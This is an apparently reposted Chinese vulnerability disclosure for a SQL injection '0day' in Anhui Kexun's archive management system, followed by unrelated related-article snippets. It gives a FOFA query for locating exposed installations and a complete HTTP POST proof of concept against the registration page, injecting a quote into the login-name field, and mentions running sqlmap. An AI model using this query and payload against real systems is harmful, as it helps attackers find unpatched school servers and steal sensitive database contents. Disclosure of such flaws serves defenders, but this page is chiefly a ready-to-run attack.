科讯档案管理系统存在SQL注入漏洞(0day)

漏洞描述
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统多接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

 FOFA:

body="安徽省科迅教育装备有限公司 版权所有"

漏洞复现

POC:

POST /admin/zhuCe.aspx HTTP/1.1
Host: 
Content-Length: 1276
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/admin/zhuCe.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=cnxjymugm5vz2pewu1wim2i5; CheckCode=2874
Connection: keep-alive__VIEWSTATE=%2FwEPDwUJOTE2NzUxOTMwD2QWAgIDD2QWAgINDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJZB4LXyFEYXRhQm91bmRnZBAVDgnlupPnrqHpg6gP5Lq65Yqb6LWE5rqQ5aSECeWtpueUn%2BWkhA%2Fop4TliJLlj5HlsZXlpIQJ5oub55Sf5aSED%2BWfueiureWwseS4muWkhAnmgLvliqHlpIQP55uR5a%2Bf5a6h6K6h5aSEEuaguOeRnuWKs%2BWKoeWFrOWPuA%2Fln7rnoYDmlZnlrabpg6gP5qC455S15bel56iL57O7GOaVmeiCsuS4juenkeWtpuaKgOacr%2Bezuw%2FkuqTpgJrlt6XnqIvns7sK5YWa5pS%2F5YqeMhUOATEBNgE3ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMzAUKwMOZ2dnZ2dnZ2dnZ2dnZ2dkZGRkQ5AxhnFuBQpRovjoynY6l6Jz20JB9%2BK3gZcFAMynfA%3D%3D&__VIEWSTATEGENERATOR=5A8EE21C&__EVENTVALIDATION=%2FwEdABYgUMRUOpnaTvT3MuTcc9EMnIXzDkrCrcbL0RzCfU3JozPzhWZ6gm6le6MUtp6VelIVLCsBEnBJc2CPcvfKwmoXM9KW7XpjHhBuINT5110rU73hoBAJzRZeyqYigwFTnuFy8BGjfquCLoLrVWyeBSOAsjxEOdVYGWgUKkCRqsD%2B8GBeSBtpFcnkARWlh0DiBtTUUI6khBLVHQWydeVVf2Co9CZXvTqeIJBfgJMMaexMGEH3a3QK4%2BERtk5Q60GujGvjgNMYWRz%2BqmMhKoVvbXdgL64n1e00Z3%2BaK3k3w2LHinIdmulgZ3eziAPp0ddszYXSxHrVyknRyG6pkcaz3kGdrnQUC79JcT%2BnHsotSJV5InDCG6sD1npFWRzd77SAvEtqp%2BHgzjKsJIetRcrTTNorOZYVAeSDCngdB4D9FxqIghmk0MkjVEwrXYdpoK2OVqdh2nw8styvTRiSboYiD9A%2BGOzUrqY%2FiCUzL2epOTZ46HlgcfjMYvR73uamwXkck1g%3D&hid_DocumentList=0&hid_type=0&txt_loginName=admin'&txtPwd=1&txtPwd2=1&txt_nickName=1&ddl_bumen=1&btn_save=%E4%BF%9D%E5%AD%98

sqlmap结果:

记录:

看到注册接口我想到的是XSS

 

尝试注册

 猜测用户名带到后端去查询了,尝试sql注入

 没过滤非法字符,sqlmap直接跑

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/411998.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

整理了100个Python精选库,建议收藏!

Python为啥这么火,这么多人学,就是因为简单好学,功能强大,整个社区非常活跃,资料很多。而且这语言涉及了方方面面,比如自动化测试,运维,爬虫,数据分析,机器学…

三. Spring Boot 当中的“容器功能” 和 “配置绑定” 的详细剖析(附+源代码流程)

三. Spring Boot 当中的“容器功能” 和 “配置绑定” 的详细剖析(附源代码流程) 文章目录 三. Spring Boot 当中的“容器功能” 和 “配置绑定” 的详细剖析(附源代码流程)1. Spring Boot 是继续支持了 Spring 当中的注解的1.2 Spring 当中的 Component,Controller…

Unraid 手动安装docker

目录 常用镜像链接一.安装示例1[firefox浏览器]:1.离线下载docker镜像2.将xxx.tar镜像数据加载到 Docker 中3.手动添加docker 二.安装示例2[等我有东西需要安装再回来补教程吧]:三.获取UDI和GID 常用镜像链接 特别版 emby 文件管理器 filebrowser内外穿透 zerotierNAS媒体库管…

JavaEE 第16节 线程安全的集合类

目录 前言 顺序表 队列 哈希表 1、Hashtable 2、ConcurrentHashMap(重点) 前言 本文章主要介绍在多线程环境下,如何线程安全的使用一些常用的集合类(顺序表和哈希表)。 顺序表 1、自己使用同步锁机制&#xff…

大数据技术

4v特点 volume(体量大) velocity(处理速度快) variety(数据类型多) value(价值密度低) 核心设计理念 并行化 规模经济 虚拟化 分布式系统满足需求 系统架构 大数据处理流程 结构化…

CocosCreator 3.8 IOS 热更新失败问题解决方案

CocosCreator 3.8 IOS 热更新失败问题解决方案 问题描述 Creator 版本: 3.8.0目标平台: ios 模拟器/真机重现方式:安卓构建版本生成的热更新包,上传到OSS,使用ios进行更新。 19:18:36 [ERROR]: [ERROR] file /Applica…

动态读取nacos中修改的项目配置文件

本项目用的还是springboot项目,咱们直接上代码 一:首先看下nacos中需要动态获取的属性 二:把需要动态读取的配置类中的属性整理一个实体类 mport lombok.Data; import org.springframework.boot.context.properties.ConfigurationPropert…

PyCharm汉化:简单一步到胃!PyCharm怎么设置中文简体

最近在弄python的项目 一起加油哦 步骤: PyCharm的汉化可以通过两种主要方法完成: 方法一:通过PyCharm内置的插件市场安装中文语言包 1. 打开PyCharm,点击File -> Settings(在Mac上是PyCharm -> Preferences…

[报错] nvcc -V 找不到

报错: nvcc : 无法将“nvcc”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写,ObjectNotFound: (nvcc:String) [], CommandNotFoundExceptionFullyQualifiedErrorId : CommandNotFoundException 找不到 nvcc -V,试过…

erlang学习:用OTP构建系统1

书上案例学习并测试 23.1 通用事件处理 -module(event_handler). %% API -export([make/1, add_handler/2, event/2]).%% 制作一个“什么都不干”的事件处理器Name(一个原子)。这样消息就有地方发送了。 make(Name) ->register(Name, spawn(fun() -…

SoftMaker Office Pro 2024:高效办公的全方位解决方案

SoftMaker Office Pro 2024是一款集高效、专业、全面于一体的办公软件套件,专为满足现代办公需求而设计。这款套件不仅包含了文字处理、电子表格、演示文稿等核心功能,还集成了项目管理、文档管理和客户管理等实用工具,为用户提供了全方位的办…

微前端集成优化:让所有子应用体积更小,加载更快!

简介 随着前端的日益发展,微前端架构越来越受到青睐。它通过将前端应用拆分为多个独立的子应用,每个子应用可以独立开发、部署和运行,从而提升了开发效率和团队协作。目前主流的微前端方案应该是qiankun了。 以笔者公司为例,采用…

Go锁 详解

锁 - Go 函数并发编程中,锁是一种同步机制,用于协调对共享资源的访问,防止数据竞争 - Go 中提供了多种类型的锁,每种锁都有不同的特性和适用场景类型 互斥锁(mutex) 基础锁,只能同时允许一个 g…

okhttp异步请求连接阻塞问题排查

表现: 使用okhttp请求外部大模型接口时,当并发在2-5左右,出现请求被阻塞在建立http连接之前,阻塞时间超长(>20s,从日志看有160s存在)。但是httpconfig的connTimeout时间配置为100s&#xff…

python如何调用函数库

python对函数库引用的第一种方式 格式是&#xff1a; import<库名> 例如&#xff1a; import turtle 如果需要用到函数库中函数&#xff0c;需要使用&#xff1a; <库名>.<函数名> 例如&#xff1a; import turtleturtle.fd(100) python对函数库引用的第…

【Qt】网格布局管理器QGridLayout

网格布局管理器QGridLayout Qt中提供QGridLayout用来实现网格布局的效果。 核心属性 整体和 QVBoxLayout 以及 QHBoxLayout 相似. 但是设置 spacing 的时候是按照垂直⽔平两个 ⽅向来设置的. 属性说明 layoutLeftMargin 左侧边距 layoutRightMargin 右侧边距 layoutTo…

这款SpringBoot+Vue酒店管理系统,你绝对值得拥有

这款SpringBootVue酒店管理系统&#xff0c;你绝对值得拥有 一、项目介绍二、相关技术栈三、运行步骤后端运行前端运行 四、项目演示总结 源码获取请关注最下方公众号并后台回复【酒店管理系统boot】即可获取&#xff01; 大家好&#xff0c;这里是程序猿代码之路&#xff01;随…

一、基于Vue3的开发-环境搭建【pnpm】安装

基于Vue3开发环境搭建 1、npm 的安装1.1、下载参考地址1.2、安装1.3、设置为国内镜像2、pnpm的安装2.1、启动PowerShell注意事项2.1、 安装2.2、常用命令3、创建项目1、npm 的安装 1.1、下载参考地址 //下载参考地址:https://nodejs.cn/download/#google_vignette下载界面 …

景联文科技提供语音采集服务:开启智能交互新纪元

随着人工智能技术的飞速发展&#xff0c;语音交互已成为连接人与智能设备的重要桥梁。无论是智能助手、智能家居还是自动驾驶汽车&#xff0c;语音识别技术都是其背后不可或缺的核心力量。 为了满足各行各业对高质量语音数据的需求&#xff0c;景联文科技凭借自身强大的数据采集…

【Python】简单的数据类型——int、float、bool、str

目录 1. 整数类型 int 2. 浮点数类型 float 3. 布尔类型 bool 4. 字符串 str 5. 格式化输出 6. 类型转换 6.1 隐式类型转换 6.2 显示类型转换 7. 标准输入 1. 整数类型 int a 10 print(type(a)) print(type(-2))<class int> <class int>测试整型能表示的…